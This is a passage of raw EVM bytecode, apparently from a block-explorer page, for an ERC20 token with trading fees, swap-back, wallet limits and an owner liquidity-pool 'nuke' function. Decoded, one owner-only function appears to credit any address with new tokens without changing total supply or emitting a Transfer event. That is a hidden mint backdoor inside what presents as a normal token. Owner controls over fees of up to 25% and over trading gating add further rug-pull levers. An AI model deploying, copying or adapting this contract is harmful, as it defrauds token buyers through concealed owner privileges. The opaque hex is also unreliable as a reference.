5260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610c34565b9392505050565b6002546123f582670de0b6b3a7640000613ecf565b1061245b5761240c81670de0b6b3a7640000613ecf565b601455600580547fffffffffffffffffffffff00ffffffffffffffffffffffffffffffffffffffff8116740100000000000000000000000000000000000000009182900460ff16159091021790555b61246d81670de0b6b3a7640000613ecf565b60085550565b73ffffffffffffffffffffffffffffffffffffffff8316612515576040517f08c379a0000000000000000000000000000000000000000000000000000000008152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460448201527f72657373000000000000000000000000000000000000000000000000000000006064820152608401610c34565b73ffffffffffffffffffffffffffffffffffffffff82166125b8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f20616464726560448201527f73730000000000000000000000000000000000000000000000000000000000006064820152608401610c34565b73ffffffffffffffffffffffffffffffffffffffff83811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b73ffffffffffffffffffffffffffffffffffffffff83166126ca576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f20616460448201527f64726573730000000000000000000000000000000000000000000000000000006064820152608401610c34565b73ffffffffffffffffffffffffffffffffffffffff821661276d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201527f65737300000000000000000000000000000000000000000000000000000000006064820152608401610c34565b8061277e57611774838360006131e5565b60115460ff1615612b6f5760055473ffffffffffffffffffffffffffffffffffffffff8481169116148015906127cf575060055473ffffffffffffffffffffffffffffffffffffffff838116911614155b80156127f0575073ffffffffffffffffffffffffffffffffffffffff821615155b8015612814575073ffffffffffffffffffffffffffffffffffffffff821661dead14155b801561283c57506005547501000000000000000000000000000000000000000000900460ff16155b15612b6f57601154610100900460ff166128b05773ffffffffffffffffffffffffffffffffffffffff8316600090815260208052604090205460ff16806128a7575073ffffffffffffffffffffffffffffffffffffffff8216600090815260208052604090205460ff165b6128b057600080fd5b60135460ff16156129bd5760055473ffffffffffffffffffffffffffffffffffffffff83811691161480159061293257507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b801561298a57507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b156129bd573260009081526012602052604090205443116129aa57600080fd5b3260009081526012602052604090204390555b73ffffffffffffffffffffffffffffffffffffffff831660009081526022602052604090205460ff168015612a18575073ffffffffffffffffffffffffffffffffffffffff821660009081526021602052604090205460ff16155b15612a6f57600854811115612a2c57600080fd5b600a5473ffffffffffffffffffffffffffffffffffffffff8316600090815260208190526040902054612a5f9083613f9b565b1115612a6a57600080fd5b612b6f565b73ffffffffffffffffffffffffffffffffffffffff821660009081526022602052604090205460ff168015612aca575073ffffffffffffffffffffffffffffffffffffffff831660009081526021602052604090205460ff16155b15612b04576008548111158015612afb575060055474010000000000000000000000000000000000000000900460ff165b612a6a57600080fd5b73ffffffffffffffffffffffffffffffffffffffff821660009081526021602052604090205460ff16612b6f57600a5473ffffffffffffffffffffffffffffffffffffffff8316600090815260208190526040902054612b649083613f9b565b1115612b6f57600080fd5b3060009081526020819052604090205460095481108015908190612b9b575060115462010000900460ff165b8015612bc357506005547501000000000000000000000000000000000000000000900460ff16155b8015612bf5575073ffffffffffffffffffffffffffffffffffffffff851660009081526022602052604090205460ff16155b8015612c26575073ffffffffffffffffffffffffffffffffffffffff8516600090815260208052604090205460ff16155b8015612c57575073ffffffffffffffffffffffffffffffffffffffff8416600090815260208052604090205460ff16155b15612ccd57600580547fffffffffffffffffffff00ffffffffffffffffffffffffffffffffffffffffff167501000000000000000000000000000000000000000000179055612ca461340f565b600580547fffffffffffffffffffff00ffffffffffffffffffffffffffffffffffffffffff1690555b6005547501000000000000000000000000000000000000000000900460ff16158015612d1e575073ffffffffffffffffffffffffffffffffffffffff841660009081526022602052604090205460ff165b8015612d2c5750600c5460ff165b8015612d475750600d54600e54612d439190613f9b565b4210155b8015612d78575073ffffffffffffffffffffffffffffffffffffffff8516600090815260208052604090205460ff16155b15612d8757612d85613663565b505b60055473ffffffffffffffffffffffffffffffffffffffff8616600090815260208052604090205460ff7501000000000000000000000000000000000000000000909204821615911680612dff575073ffffffffffffffffffffffffffffffffffffffff8516600090815260208052604090205460ff165b15612e08575060005b600081156130075773ffffffffffffffffffffffffffffffffffffffff861660009081526022602052604090205460ff168015612e4757506000601954115b15612eff57612e66606461226c601954886130ee90919063ffffffff16565b9050601954601b5482612e799190613ecf565b612e839190613f0c565b601e6000828254612e949190613f9b565b9091555050601954601c54612ea99083613ecf565b612eb39190613f0c565b601f6000828254612ec49190613f9b565b9091555050601954601a54612ed99083613ecf565b612ee39190613f0c565b601d6000828254612ef49190613f9b565b90915550612fe99050565b73ffffffffffffffffffffffffffffffffffffffff871660009081526022602052604090205460ff168015612f3657506000601554115b15612fe957612f55606461226c601554886130ee90919063ffffffff16565b905060155460175482612f689190613ecf565b612f729190613f0c565b601e6000828254612f839190613f9b565b9091555050601554601854612f989083613ecf565b612fa29190613f0c565b601f6000828254612fb39190613f9b565b9091555050601554601654612fc89083613ecf565b612fd29190613f0c565b601d6000828254612fe39190613f9b565b90915550505b8015612ffa57612ffa8730836131e5565b6130048186613fcc565b94505b6130128787876131e5565b50505050505050565b60008184841115613059576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c349190613c62565b5060006130668486613fcc565b95945050505050565b73ffffffffffffffffffffffffffffffffffffffff821660008181526022602052604080822080547fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff001685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6000826130fd57506000610db0565b60006131098385613ecf565b9050826131168583613f0c565b146123d9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60448201527f77000000000000000000000000000000000000000000000000000000000000006064820152608401610c34565b60006123d983836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613835565b73ffffffffffffffffffffffffffffffffffffffff8316613288576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f20616460448201527f64726573730000000000000000000000000000000000000000000000000000006064820152608401610c34565b73ffffffffffffffffffffffffffffffffffffffff821661332b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201527f65737300000000000000000000000000000000000000000000000000000000006064820152608401610c34565b613375816040518060600160405280602681526020016140e96026913973ffffffffffffffffffffffffffffffffffffffff8616600090815260208190526040902054919061301b565b73ffffffffffffffffffffffffffffffffffffffff80851660009081526020819052604080822093909355908416815220546133b19082612360565b73ffffffffffffffffffffffffffffffffffffffff8381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910161261a565b3060009081526020819052604081205490506000601f54601d54601e546134369190613f9b565b6134409190613f9b565b9050600082158061344f575081155b1561345957505050565b600954613467906014613ecf565b83111561347f5760095461347c906014613ecf565b92505b6000600283601e54866134929190613ecf565b61349c9190613f0c565b6134a69190613f0c565b905060006134b4858361387d565b9050476134c0826138bf565b60006134cc478361387d565b905060006134e98761226c601d54856130ee90919063ffffffff16565b905060006135068861226c601f54866130ee90919063ffffffff16565b90506000816135158486613fcc565b61351f9190613fcc565b6000601e819055601d819055601f81905560075460405192935073ffffffffffffffffffffffffffffffffffffffff1691849181818185875af1925050503d8060008114613589576040519150601f19603f3d011682016040523d82523d6000602084013e61358e565b606091505b509098505086158015906135a25750600081115b156135f5576135b18782613af5565b601e54604080518881526020810184905280820192909252517f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619181900360600190a15b60065460405173ffffffffffffffffffffffffffffffffffffffff909116904790600081818185875af1925050503d806000811461364f576040519150601f19603f3d011682016040523d82523d6000602084013e613654565b606091505b50505050505050505050505050565b42600e556040517f70a0823100000000000000000000000000000000000000000000000000000000815273ffffffffffffffffffffffffffffffffffffffff7f0000000000000000000000000000000000000000000000000000000000000000166004820152600090819030906370a082319060240160206040518083038186803b1580156136f157600080fd5b505afa158015613705573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906137299190613fb3565b9050600061374861271061226c600b54856130ee90919063ffffffff16565b9050801561377d5761377d7f000000000000000000000000000000000000000000000000000000000000000061dead836131e5565b60007f000000000000000000000000000000000000000000000000000000000000000090508073ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156137ea57600080fd5b505af11580156137fe573d6000803e3d6000fd5b50506040517f454c91ae84fcc766ddda0dcb289f26b3d0176efeacf4061fc219fa6ca8c3048d925060009150a16001935050505090565b60008183613870576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c349190613c62565b5060006130668486613f0c565b60006123d983836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061301b565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106138f4576138f4613fe3565b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b15801561399457600080fd5b505afa1580156139a8573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906139cc9190614012565b816001815181106139df576139df613fe3565b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050613a44307f000000000000000000000000000000000000000000000000000000000000000084612473565b6040517f791ac94700000000000000000000000000000000000000000000000000000000815273ffffffffffffffffffffffffffffffffffffffff7f0000000000000000000000000000000000000000000000000000000000000000169063791ac94790613abf90859060009086903090429060040161402f565b600060405180830381600087803b158015613ad957600080fd5b505af1158015613aed573d6000803e3d6000fd5b505050505050565b613b20307f000000000000000000000000000000000000000000000000000000000000000084612473565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080613b8160055473ffffffffffffffffffffffffffffffffffffffff1690565b60405160e088901b7fffffffff0000000000000000000000000000000000000000000000000000000016815273ffffffffffffffffffffffffffffffffffffffff958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c4016060604051808303818588803b158015613c0957600080fd5b505af1158015613c1d573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190613c4291906140ba565b5050505050565b600060208284031215613c5b57600080fd5b5035919050565b600060208083528351808285015260005b81811015613c8f57858101830151858201604001528201613c73565b81811115613ca1576000604083870101525b50601f017fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe016929092016040019392505050565b73ffffffffffffffffffffffffffffffffffffffff81168114610d0a57600080fd5b60008060408385031215613d0a57600080fd5b8235613d1581613cd5565b946020939093013593505050565b600060208284031215613d3557600080fd5b81356123d981613cd5565b600080600060608486031215613d5557600080fd5b8335613d6081613cd5565b92506020840135613d7081613cd5565b929592945050506040919091013590565b80358015158114611d5d57600080fd5b600080600060608486031215613da657600080fd5b8335925060208401359150613dbd60408501613d81565b90509250925092565b60008060408385031215613dd957600080fd5b8235613de481613cd5565b9150613df260208401613d81565b90509250929050565b600060208284031215613e0d57600080fd5b6123d982613d81565b600080600060608486031215613e2b57600080fd5b505081359360208301359350604090920135919050565b60008060408385031215613e5557600080fd5b823591506020830135613e6781613cd5565b809150509250929050565b60008060408385031215613e8557600080fd5b8235613e9081613cd5565b91506020830135613e6781613cd5565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615613f0757613f07613ea0565b500290565b600082613f42577f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b500490565b600181811c90821680613f5b57607f821691505b60208210811415613f95577f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b50919050565b60008219821115613fae57613fae613ea0565b500190565b600060208284031215613fc557600080fd5b5051919050565b600082821015613fde57613fde613ea0565b500390565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006020828403121561402457600080fd5b81516123d981613cd5565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b8181101561408c57845173ffffffffffffffffffffffffffffffffffffffff168352938301939183019160010161405a565b505073ffffffffffffffffffffffffffffffffffffffff969096166060850152505050608001529392505050565b6000806000606084860312156140cf57600080fd5b835192506020840151915060408401519050925092509256fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220fb162dfc325fca2f0004f2891d63d022a5d14b6d26d46df03eae463c3382e7ba64736f6c634300080900334f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657200000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000004000000000000000000000000f09f18ddbb7b20da162ce02e3868d3a2c73f931a0000000000000000000000003c669a3e710e5f377493d26cd81b1b4a51368bcc00000000000000000000000007e438c264860e54130c7bc570bbfdd0dd33ec1a000000000000000000000000f637a496cce37501d828f01490c89a291e865699

Deployed Bytecode

0x6080604052600436106103b15760003560e01c8063924de9b7116101e7578063bd8d82111161010d578063dd62ed3e116100a0578063f2fde38b1161006f578063f2fde38b14610b4b578063f637434214610b6b578063f8b45b0514610b81578063fe72b27a14610b9757600080fd5b8063dd62ed3e14610ab7578063e2f4560514610b0a578063e884f26014610b20578063f11a24d314610b3557600080fd5b8063cd7b33ab116100dc578063cd7b33ab14610a41578063d257b34f14610a61578063d85ba06314610a81578063db1dbb8b14610a9757600080fd5b8063bd8d8211146109d1578063c0246668146109f1578063c876d0b914610a11578063c8c8ebe414610a2b57600080fd5b8063a0d82dc511610185578063a9059cbb11610154578063a9059cbb14610942578063b62496f514610962578063bb85c6d114610992578063bbc0c742146109b257600080fd5b8063a0d82dc5146108d6578063a3d14e72146108ec578063a457c2d71461090c578063a4c82a001461092c57600080fd5b80639a7a23d6116101c15780639a7a23d6146108745780639c3b4fdc146108945780639ec22c0e146108aa5780639fccce32146108c057600080fd5b8063924de9b71461080d57806392d0d1531461082d57806395d89b411461085f57600080fd5b806339509351116102d7578063730c18881161026a5780638a8c523c116102395780638a8c523c1461078a5780638da5cb5b1461079f5780638ea5220f146107ca57806392136913146107f757600080fd5b8063730c1888146107075780637571336a1461072757806375f0a874146107475780637bce5a041461077457600080fd5b80636a486a8e116102a65780636a486a8e146106795780636ddd17131461068f57806370a08231146106af578063715018a6146106f257600080fd5b806339509351146105c657806349bd5a5e146105e65780634a62bb651461061a5780634fbee1931461063457600080fd5b8063199ffc721161034f57806323b872dd1161031e57806323b872dd1461055a5780632c3e486c1461057a5780632e82f1a014610590578063313ce567146105aa57600080fd5b8063199ffc72146104f85780631a8145bb1461050e5780631c499ab0146105245780631f3fed8f1461054457600080fd5b806310d5de531161038b57806310d5de531461043a5780631694505e1461046a57806318160ddd146104c3578063184c16c5146104e257600080fd5b80630517d13d146103bd57806306fdde03146103df578063095ea7b31461040a57600080fd5b366103b857005b600080fd5b3480156103c957600080fd5b506103dd6103d8366004613c49565b610bb7565b005b3480156103eb57600080fd5b506103f4610d0d565b6040516104019190613c62565b60405180910390f35b34801561041657600080fd5b5061042a610425366004613cf7565b610d9f565b6040519015158152602001610401565b34801561044657600080fd5b5061042a610455366004613d23565b60216020526000908152604090205460ff1681565b34801561047657600080fd5b5061049e7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b60405173ffffffffffffffffffffffffffffffffffffffff9091168152602001610401565b3480156104cf57600080fd5b506002545b604051908152602001610401565b3480156104ee57600080fd5b506104d4600f5481565b34801561050457600080fd5b506104d4600b5481565b34801561051a57600080fd5b506104d4601e5481565b34801561053057600080fd5b506103dd61053f366004613c49565b610db6565b34801561055057600080fd5b506104d4601d5481565b34801561056657600080fd5b5061042a610575366004613d40565b610f12565b34801561058657600080fd5b506104d4600d5481565b34801561059c57600080fd5b50600c5461042a9060ff1681565b3480156105b657600080fd5b5060405160128152602001610401565b3480156105d257600080fd5b5061042a6105e1366004613cf7565b610f88565b3480156105f257600080fd5b5061049e7f000000000000000000000000862eb301db536f1e03f1bba8914d9d140b26356981565b34801561062657600080fd5b5060115461042a9060ff1681565b34801561064057600080fd5b5061042a61064f366004613d23565b73ffffffffffffffffffffffffffffffffffffffff16600090815260208052604090205460ff1690565b34801561068557600080fd5b506104d460195481565b34801561069b57600080fd5b5060115461042a9062010000900460ff1681565b3480156106bb57600080fd5b506104d46106ca366004613d23565b73ffffffffffffffffffffffffffffffffffffffff1660009081526020819052604090205490565b3480156106fe57600080fd5b506103dd610fcb565b34801561071357600080fd5b506103dd610722366004613d91565b6110bb565b34801561073357600080fd5b506103dd610742366004613dc6565b6112a4565b34801561075357600080fd5b5060065461049e9073ffffffffffffffffffffffffffffffffffffffff1681565b34801561078057600080fd5b506104d460165481565b34801561079657600080fd5b506103dd61137b565b3480156107ab57600080fd5b5060055473ffffffffffffffffffffffffffffffffffffffff1661049e565b3480156107d657600080fd5b5060075461049e9073ffffffffffffffffffffffffffffffffffffffff1681565b34801561080357600080fd5b506104d4601a5481565b34801561081957600080fd5b506103dd610828366004613dfb565b61142f565b34801561083957600080fd5b5060055461042a9074010000000000000000000000000000000000000000900460ff1681565b34801561086b57600080fd5b506103f46114e8565b34801561088057600080fd5b506103dd61088f366004613dc6565b6114f7565b3480156108a057600080fd5b506104d460185481565b3480156108b657600080fd5b506104d460105481565b3480156108cc57600080fd5b506104d4601f5481565b3480156108e257600080fd5b506104d4601c5481565b3480156108f857600080fd5b506103dd610907366004613e16565b611662565b34801561091857600080fd5b5061042a610927366004613cf7565b611779565b34801561093857600080fd5b506104d4600e5481565b34801561094e57600080fd5b5061042a61095d366004613cf7565b6117d5565b34801561096e57600080fd5b5061042a61097d366004613d23565b60226020526000908152604090205460ff1681565b34801561099e57600080fd5b506103dd6109ad366004613d23565b6117e2565b3480156109be57600080fd5b5060115461042a90610100900460ff1681565b3480156109dd57600080fd5b506103dd6109ec366004613d23565b6118f2565b3480156109fd57600080fd5b506103dd610a0c366004613dc6565b611a02565b348015610a1d57600080fd5b5060135461042a9060ff1681565b348015610a3757600080fd5b506104d460085481565b348015610a4d57600080fd5b506103dd610a5c366004613e16565b611b0b565b348015610a6d57600080fd5b5061042a610a7c366004613c49565b611c1f565b348015610a8d57600080fd5b506104d460155481565b348015610aa357600080fd5b5061042a610ab2366004613e42565b611d62565b348015610ac357600080fd5b506104d4610ad2366004613e72565b73ffffffffffffffffffffffffffffffffffffffff918216600090815260016020908152604080832093909416825291909152205490565b348015610b1657600080fd5b506104d460095481565b348015610b2c57600080fd5b5061042a611e45565b348015610b4157600080fd5b506104d460175481565b348015610b5757600080fd5b506103dd610b66366004613d23565b611ef7565b348015610b7757600080fd5b506104d4601b5481565b348015610b8d57600080fd5b506104d4600a5481565b348015610ba357600080fd5b5061042a610bb2366004613c49565b612006565b60055473ffffffffffffffffffffffffffffffffffffffff163314610c3d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b610c46816123e0565b670de0b6b3a7640000620f4240610c5c60025490565b610c67906001613ecf565b610c719190613f0c565b610c7b9190613f0c565b811015610d0a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152602960248201527f43616e6e6f7420736574206d61785472616e73616374696f6e206c6f7765722060448201527f7468616e20302e312500000000000000000000000000000000000000000000006064820152608401610c34565b50565b606060038054610d1c90613f47565b80601f0160208091040260200160405190810160405280929190818152602001828054610d4890613f47565b8015610d955780601f10610d6a57610100808354040283529160200191610d95565b820191906000526020600020905b815481529060010190602001808311610d7857829003601f168201915b5050505050905090565b6000610dac338484612473565b5060015b92915050565b60055473ffffffffffffffffffffffffffffffffffffffff163314610e37576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b670de0b6b3a7640000620f4240610e4d60025490565b610e58906001613ecf565b610e629190613f0c565b610e6c9190613f0c565b811015610efa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152602060048201526024808201527f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060448201527f302e3525000000000000000000000000000000000000000000000000000000006064820152608401610c34565b610f0c81670de0b6b3a7640000613ecf565b600a5550565b6000610f1f848484612627565b610f7e8433610f798560405180606001604052806028815260200161410f6028913973ffffffffffffffffffffffffffffffffffffffff8a166000908152600160209081526040808320338452909152902054919061301b565b612473565b5060019392505050565b33600081815260016020908152604080832073ffffffffffffffffffffffffffffffffffffffff871684529091528120549091610dac918590610f799086612360565b60055473ffffffffffffffffffffffffffffffffffffffff16331461104c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b60055460405160009173ffffffffffffffffffffffffffffffffffffffff16907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600580547fffffffffffffffffffffffff0000000000000000000000000000000000000000169055565b60055473ffffffffffffffffffffffffffffffffffffffff16331461113c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b6102588310156111ce576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152603360248201527f63616e6e6f7420736574206275796261636b206d6f7265206f6674656e20746860448201527f616e206576657279203130206d696e75746573000000000000000000000000006064820152608401610c34565b6103e882111580156111de575060015b61126a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152603060248201527f4d75737420736574206175746f204c50206275726e2070657263656e7420626560448201527f747765656e20302520616e6420313025000000000000000000000000000000006064820152608401610c34565b600d92909255600b55600c80547fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0016911515919091179055565b60055473ffffffffffffffffffffffffffffffffffffffff163314611325576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b73ffffffffffffffffffffffffffffffffffffffff91909116600090815260216020526040902080547fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0016911515919091179055565b60055473ffffffffffffffffffffffffffffffffffffffff1633146113fc576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b601180547fffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000ff166201010017905542600e55565b60055473ffffffffffffffffffffffffffffffffffffffff1633146114b0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b6011805491151562010000027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00ffff909216919091179055565b606060048054610d1c90613f47565b60055473ffffffffffffffffffffffffffffffffffffffff163314611578576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b7f000000000000000000000000862eb301db536f1e03f1bba8914d9d140b26356973ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611654576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152603960248201527f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060448201527f6175746f6d617465644d61726b65744d616b65725061697273000000000000006064820152608401610c34565b61165e828261306f565b5050565b60055473ffffffffffffffffffffffffffffffffffffffff1633146116e3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b601a839055601b829055601c819055806116fd8385613f9b565b6117079190613f9b565b60198181551015611774576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152601d60248201527f4d757374206b656570206665657320617420323525206f72206c6573730000006044820152606401610c34565b505050565b6000610dac3384610f79856040518060600160405280602581526020016141376025913933600090815260016020908152604080832073ffffffffffffffffffffffffffffffffffffffff8d168452909152902054919061301b565b6000610dac338484612627565b60055473ffffffffffffffffffffffffffffffffffffffff163314611863576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b60065460405173ffffffffffffffffffffffffffffffffffffffff918216918316907fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567490600090a3600680547fffffffffffffffffffffffff00000000000000000000000000000000000000001673ffffffffffffffffffffffffffffffffffffffff92909216919091179055565b60055473ffffffffffffffffffffffffffffffffffffffff163314611973576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b60075460405173ffffffffffffffffffffffffffffffffffffffff918216918316907f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74390600090a3600780547fffffffffffffffffffffffff00000000000000000000000000000000000000001673ffffffffffffffffffffffffffffffffffffffff92909216919091179055565b60055473ffffffffffffffffffffffffffffffffffffffff163314611a83576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b73ffffffffffffffffffffffffffffffffffffffff82166000818152602080805260409182902080547fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff001685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b60055473ffffffffffffffffffffffffffffffffffffffff163314611b8c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b60168390556017829055601881905580611ba68385613f9b565b611bb09190613f9b565b601581905560141015611774576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152601d60248201527f4d757374206b656570206665657320617420323025206f72206c6573730000006044820152606401610c34565b60055460009073ffffffffffffffffffffffffffffffffffffffff163314611ca3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b620186a0611cb060025490565b611cbb906001613ecf565b611cc59190613f0c565b821015611d54576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152603560248201527f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60448201527f20302e3030312520746f74616c20737570706c792e00000000000000000000006064820152608401610c34565b50600981905560015b919050565b60055460009073ffffffffffffffffffffffffffffffffffffffff163314611de6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b73ffffffffffffffffffffffffffffffffffffffff8216600090815260208190526040902054611e169084612360565b73ffffffffffffffffffffffffffffffffffffffff831660009081526020819052604090205550600192915050565b60055460009073ffffffffffffffffffffffffffffffffffffffff163314611ec9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b50601380547fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00169055600190565b60055473ffffffffffffffffffffffffffffffffffffffff163314611f78576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b60055460405173ffffffffffffffffffffffffffffffffffffffff8084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600580547fffffffffffffffffffffffff00000000000000000000000000000000000000001673ffffffffffffffffffffffffffffffffffffffff92909216919091179055565b60055460009073ffffffffffffffffffffffffffffffffffffffff16331461208a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c34565b600f5460105461209a9190613f9b565b4211612102576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820181905260248201527f4d757374207761697420666f7220636f6f6c646f776e20746f2066696e6973686044820152606401610c34565b6103e8821115612194576040517f08c379a000000000000000000000000000000000000000000000000000000000815260206004820152602a60248201527f4d6179206e6f74206e756b65206d6f7265207468616e20313025206f6620746f60448201527f6b656e7320696e204c50000000000000000000000000000000000000000000006064820152608401610c34565b426010556040517f70a0823100000000000000000000000000000000000000000000000000000000815273ffffffffffffffffffffffffffffffffffffffff7f000000000000000000000000862eb301db536f1e03f1bba8914d9d140b26356916600482015260009030906370a082319060240160206040518083038186803b15801561222057600080fd5b505afa158015612234573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906122589190613fb3565b9050600061227261271061226c84876130ee565b906131a3565b905080156122a7576122a77f000000000000000000000000862eb301db536f1e03f1bba8914d9d140b26356961dead836131e5565b60007f